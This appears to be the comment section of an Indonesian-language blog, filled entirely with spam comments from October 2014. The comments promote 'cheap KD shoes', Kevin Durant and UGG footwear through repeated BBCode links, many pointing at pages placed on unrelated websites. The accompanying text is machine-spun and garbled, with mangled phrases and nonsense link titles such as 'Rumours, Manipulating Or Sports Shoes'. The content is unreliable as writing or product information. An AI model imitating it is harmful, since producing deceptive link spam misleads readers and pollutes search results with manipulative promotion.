    berkomentar pada jam 12:56 pm
    tanggal 30 October 2014

    [url=http://www.oxenchem.com/aboutus/cheap-kd-7.php]KD Shoes[/url] Once you try it on, your foot feel it really comfy for the reason that it can be real leather.. [url=http://www.oxenchem.com/aboutus/cheap-kd-7.php]Kevin Durant Shoes[/url] It leading you pass the real leather world..

    [url=http://www.oxenchem.com/aboutus/cheap-kd-6.php]Cheap Kd Shoes[/url] Soon after trying it on, when i walk on my strategy to perform,my foot really feel straightforward.. [url=http://www.oxenchem.com/aboutus/cheap-kd-Shoes.php]Cheap Kd Shoes[/url] On the upper portion of this shoes, there are actually metal studs, it decorate the shoes, makes it extra beautiful and fashion..

    [url=http://www.oxenchem.com/aboutus/cheap-kd-7.php]Kevin Durant Shoes[/url] It truly is by handmade by worker, fix it 1 by 1.. [url=http://www.oxenchem.com/aboutus/cheap-kd-6.php]Kevin Durant 6 Shoes[/url] This can be a large distinction from the other shoes, naturally and manmade crafts..

    [url=http://www.bubbleroom.se/sv/kl%c3%a4der/kvinna/vila/minikjolar/cados-skirt-bronze]Get The Scoop Around Sneakers Before You’re Too Late[/url]
    [url=http://www.7611.org/home.php?mod=space&uid=31572]Get This Scoop On Sneakers Before You Are Too Late[/url]
    [url=http://williamsburg.plantrescue.org/?q=node/21]Our Own Dummies Help Guide For Shoes Explained[/url]
    [url=http://vseti-tm.ru/komedii/217-brave.html]Rumours, Manipulating Or Sports Shoes[/url]

  175. 175
    =
    berkomentar pada jam 3:13 am
    tanggal 31 October 2014

    A02 8 Yue most recent single item release, as at all times, lovely variety dress with all the primary components on the familiar cat , this time in blue become the protagonist , so early autumn becomes even more refreshing. Lace , printing and graffiti mix effect , so the dress becomes casual and charming , platform footwear [url=http://www.ceconsulting.es/poll/espana/ugg-shop-online.html]ugg shop online[/url] match the laser light effect , there is nothing at all additional adorable than this .

  176. 176
    =
    berkomentar pada jam 3:49 pm
    tanggal 31 October 2014

    [url=http://www.oxenchem.com/aboutus/kd-shoes.php]http://www.oxenchem.com/aboutus/kd-shoes.php[/url] It also uses an inside zipper mechanism as with the April style boot and again, there’s an elastic panel for larger calf allowance and it has synthetic soles… [url=http://www.oxenchem.com/aboutus/kd-shoes.php]Kd Shoes[/url] A shoe is a piece of footwear meant to guard and comfort the human foot whereas doing different activities..

    [url=http://www.oxenchem.com/aboutus/kd-shoes.php]Cheap Basketball Shoes[/url] Shoes are also used as an article of decoration.. [url=http://www.oxenchem.com/aboutus/kd-shoes.php]Cheap Basketball Shoes[/url] The look of shoes has speckled extremely through time and from customs to customs, with look initially being linked with function..

    [url=http://www.oxenchem.com/aboutus/kd-shoes.php]Cheap Basketball Shoes[/url] Additionally fashion has often ruled several design elements, like whether or not shoes have extremely high heels or flat ones… [url=http://www.oxenchem.com/aboutus/kd-shoes.php]Kd Shoes[/url] After working for several years for important Italian men’s leather shoes company, Aurelio decided to follow his dream of creating unique high fashion shoes that are considered fashion dress shoes..

    [url=http://www.sertifikata.net/uslugi/sertifikat-sootvetstviya.html]Gossip, Untruths Or Sports Shoes[/url]
    [url=http://businessesknoxville.com/Peter-Bilodeau-Freelance-Writer/]My Favorite Fools Help Guide For Shoes Simplified[/url]
    [url=http://www.talexpo.com/]Gossips, Manipulating Along With Sports Shoes[/url]


Isi Komentar


  • *